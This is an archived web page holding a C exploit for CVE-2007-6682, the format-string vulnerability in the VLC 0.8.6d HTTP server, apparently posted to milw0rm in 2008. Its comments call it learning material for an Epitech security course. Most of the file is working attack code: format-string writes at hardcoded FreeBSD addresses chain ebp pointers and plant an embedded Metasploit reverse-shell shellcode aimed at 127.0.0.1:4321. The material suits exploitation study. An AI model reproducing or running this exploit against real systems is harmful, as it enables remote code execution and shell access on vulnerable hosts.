_____________________________________________________________________________
/ / Index / Goinfre / Resume / Links / Contact / Sitemap / .: v0.6.1.0 |^|
|\__/-------+ +--------+-------+---------+---------+-----------------+#|
| 1| /goinfre/externals/080428-epibite-vlc/5519 |#|
| 2| ========================================== |#|
| 3| |#|
| 4| [ raw ] [ download ] |#|
| 5| ` `` ````````````````````` |#|
| 6| |#|
| 7| /* Epibite // bite since 1442 |#|
| 8| * pown meme ta mamie |#|
| 9| */ |#|
| 10| |#|
| 11| /* Advisory from Luigi Auriemma |#|
| 12| * CVE-2007-6682 / format string in VideoLAN VLC 0.8.6d |#|
| 13| * |#|
| 14| * Description : |#|
| 15| * Format string vulnerability in the httpd_FileCallBack |#|
| 16| * function (network/httpd.c) in VideoLAN VLC 0.8.6d allows |#|
| 17| * remote attackers to execute arbitrary code via format |#|
| 18| * string specifiers in the Connection parameter. |#|
| 19| */ |#|
| 20| |#|
| 21| /* La faille n'a d'interet que dans un but d'apprentissage |#|
| 22| * d'une technique avance d'exploitation des chaines de |#|
| 23| * format. |#|
| 24| * |#|
| 25| * Toute la difficulte de l'exploitation est liee au fait |#|
| 26| * que la chaine de format se trouve dans un thread, et |#|
| 27| * la pile remplie avec des adresses du tas. |#|
| 28| * On est donc oblige d'utiliser la technique dite de |#|
| 29| * "l'ebp chaining". |#|
| 30| * |#|
| 31| * On pardonnera le manque de proprete et de portabilite, |#|
| 32| * defauts qui sont expliques et corriges durant son |#|
| 33| * utilisation sur la plateforme de tutoriaux de |#|
| 34| * l'Epitech Security Laboratory. |#|
| 35| */ |#|
| 36| |#|
| 37| /* Traduction: |#|
| 38| * This is ugly and not cross plateform, use it for |#|
| 39| * learning purpose. (^-^) |#|
| 40| */ |#|
| 41| |#|
| 42| #include <stdlib.h> |#|
| 43| #include <stdio.h> |#|
| 44| #include <string.h> |#|
| 45| #include <strings.h> |#|
| 46| #include <unistd.h> |#|
| 47| |#|
| 48| #include <netinet/in.h> |#|
| 49| #include <arpa/inet.h> |#|
| 50| |#|
| 51| #include <sys/types.h> |#|
| 52| #include <sys/socket.h> |#|
| 53| |#|
| 54| int connect_(char *, int); |#|
| 55| void exit_(int, char *); |#|
| 56| char *get_payload(unsigned short, unsigned short/* , unsigned |#|
| 57| short * */); |#|
| 58| void progressbar(void); |#|
| 59| void write_short(unsigned short, unsigned short); |#|
| 60| |#|
| 61| #define REQUEST "GET / HTTP/1.0\r\n" \ |#|
| 62| "Connection: " |#|
| 63| |#|
| 64| /* Chaining ebp // FREEBSD8 - 0.8.6d : |#|
| 65| * |#|
| 66| * (0xbf5fa838) -> 0xbf5fafa8 // 12$ httpd_FileCallBack() |#|
| 67| * _____________/ |#|
| 68| * / |#|
| 69| * (0xbf5fafa8) -> 0xbf5fafe8 // 488$ httpd_HostThread() |#|
| 70| * _____________/ |#|
| 71| * / |#|
| 72| * (0xbf5fafe8) -> 0x00000000 // 504$ pthread_getprio() |#|
| 73| * |#|
| 74| * (0xbfbee2b8) // (bf5f)e2b8 is an eip value |#|
| 75| * because we write short by short, |#|
| 76| * we've just have to write (bfbe) |#|
| 77| * in order to have the sc addr. |#|
| 78| * (0xbf5fa83c) // An eip -> 12$ + 4 |#|
| 79| */ |#|
| 80| |#|
| 81| #define FIRST_EBP 12 |#|
| 82| #define SECOND_EBP 488 |#|
| 83| #define THIRD_EBP 504 |#|
| 84| |#|
| 85| #define FBSD8_ESP ( 0xbf5fa808 ) |#|
| 86| #define FBSD8_SCADDR ( 0xbfbee2b8 ) |#|
| 87| |#|
| 88| int port; |#|
| 89| char *ip; |#|
| 90| |#|
| 91| /* bsd_ia32_reverse - LHOST=127.0.0.1 LPORT=4321 Size=92 |#|
| 92| http://metasploit.com */ |#|
| 93| unsigned char scode[] = |#|
| 94| "\x33\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c" |#|
| 95| "\x3c\x56\xcc\x83\xeb\xfc\xe2\xf4\x06\x5d\x0e\x55\x3e\x7e\x04\x8e" |#|
| 96| "\x3e\x54\x29\xcc\x6c\x3d\x9b\x4c\x04\x2c\x54\xdc\x8d\xb5\xb7\xa6" |#|
| 97| "\x7c\x6d\x06\x9d\xfb\x56\x34\x94\xa1\xbc\x3c\xce\x35\x8c\x0c\x9d" |#|
| 98| "\x3b\x6d\x9b\x4c\x25\x45\xa0\x9c\x04\x13\x79\xbf\x04\x54\x79\xae" |#|
| 99| "\x05\x52\xdf\x2f\x3c\x68\x05\x9f\xdc\x07\x9b\x4c"; |#|
|100| |#|
|101| int main(int argc, char **argv) |#|
|102| { |#|
|103| unsigned int i; |#|
|104| |#|
|105| if (argc < 3) |#|
|106| (void) exit_(1, "Usage: exploit ip port\n"); |#|
|107| ip = argv[1]; |#|
|108| port = atoi(argv[2]); |#|
|109| printf("[+] Victim is : %s:%d...\n", ip, port); |#|
|110| printf("[+] Shellcode size : %d // located at : 0x%08x\n", |#|
|111| strlen((char *)scode), FBSD8_SCADDR); |#|
|112| printf("[+] EIP is located at : 0x%08x\n", FBSD8_ESP + FIRST_EBP * 4 |#|
|113| + 4 + 2); |#|
|114| |#|
|115| (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + |#|
|116| 2), |#|
|117| FIRST_EBP); |#|
|118| (void) write_short((unsigned short)(FBSD8_SCADDR >> 16), |#|
|119| SECOND_EBP); |#|
|120| (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)), |#|
|121| FIRST_EBP); |#|
|122| |#|
|123| for (i = 0; i < strlen((char*)scode); i += 2) |#|
|124| { |#|
|125| (void) write_short((unsigned short)(FBSD8_SCADDR + i), |#|
|126| SECOND_EBP); |#|
|127| (void) write_short((unsigned short)(*((unsigned short *)(scode + |#|
|128| i))), |#|
|129| THIRD_EBP); |#|
|130| } |#|
|131| |#|
|132| (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + |#|
|133| 2), |#|
|134| FIRST_EBP); |#|
|135| (void) write_short((unsigned short)(FBSD8_ESP >> 16), SECOND_EBP); |#|
|136| (void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)), |#|
|137| FIRST_EBP); |#|
|138| (void) write_short((unsigned short)(FBSD8_ESP + FIRST_EBP * 4 + 4 + |#|
|139| 2), |#|
|140| SECOND_EBP); |#|
|141| (void) write_short((unsigned short)(FBSD8_SCADDR >> 16), THIRD_EBP); |#|
|142| |#|
|143| printf("[+] Done.\n"); |#|
|144| return (0); |#|
|145| } |#|
|146| |#|
|147| char *get_payload(unsigned short data, |#|
|148| unsigned short pop |#|
|149| /* unsigned short *offset */) |#|
|150| { |#|
|151| static char buffer[32]; | |
|152| char buffi[9]; | |
|153| | |
|154| /* data = data - *offset; */ | |
|155| if ((unsigned short)data < 8) | |
|156| { | |
|157| memset(buffi, '0', 9); | |
|158| buffi[data] = '\0'; | |
|159| sprintf(buffer, "%s%%%d$hn", buffi, pop); | |
|160| } | |
|161| else | |
|162| sprintf(buffer, "%%%du%%%d$hn", data, pop); | |
|163| /* *offset = *offset + data; */ | |
|164| return (buffer); | |
|165| } | |
|166| | |
|167| void write_short(unsigned short data, unsigned short pop) | |
|168| { | |
|169| char buff[1024]; | |
|170| int ret; | |
|171| int sock; | |
|172| | |
|173| memset(buff, '\0', 42); | |
|174| strcat(buff, REQUEST); | |
|175| strcat(buff, get_payload(data, pop)); | |
|176| strcat(buff, "\r\n\r\n"); | |
|177| sock = connect_(ip, port); | |
|178| if (write(sock, buff, strlen(buff)) < (int)strlen(buff)) | |
|179| (void) exit_(1, "[-] write()\n"); | |
|180| while ((ret = read(sock, buff, 1024))) | |
|181| ; | |
|182| if (close(sock) < 0) | |
|183| (void) exit_(1, "[-] close()\n"); | |
|184| return ; | |
|185| } | |
|186| | |
|187| void exit_(int i, char *bite) | |
|188| { | |
|189| write(2, bite, strlen(bite)); | |
|190| (void) exit(i); | |
|191| } | |
|192| | |
|193| int connect_(char *ip, int port) | |
|194| { | |
|195| int sock; | |
|196| struct sockaddr_in s; | |
|197| | |
|198| (void) progressbar(); | |
|199| if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) | |
|200| (void) exit_(1, "[-] socket()\n"); | |
|201| bzero(&s, sizeof(s)); | |
|202| s.sin_family = AF_INET; | |
|203| s.sin_port = htons(port); | |
|204| s.sin_addr.s_addr = inet_addr(ip); | |
|205| if (connect(sock, (struct sockaddr *)&s, sizeof(s)) < 0) | |
|206| (void) exit_(1, "[-] connect()\n"); | |
|207| return (sock); | |
|208| } | |
|209| | |
|210| void progressbar(void) | |
|211| { | |
|212| static unsigned int c = 0; | |
|213| | |
|214| write(1, "D ", 12 | |
|215| - write(1, "[?] 8=====", 5 + ((c >> 2 & 1 ? -1 : 1) | |
|216| * (++c & 3) | |
|217| + (c % 0x20 & 100)))); | |
|218| write(1, "p0wn in progress", 19); | |
|219| write(1, "...", c / 4 % 4); | |
|220| write(1, " \r", 4); | |
|221| return ; | |
|222| } | |
|223| | |
|224| // milw0rm.com [2008-04-28] | |
+---+ | |
\_ \______ mo5.so - normal - 1337.so - rev.so - video_r.so +---------------+ |
|__ \_____ plain.so - color.so - comment.so / moul 2008 (c) |V|
\-----\______\________________________________________/-----------------+-+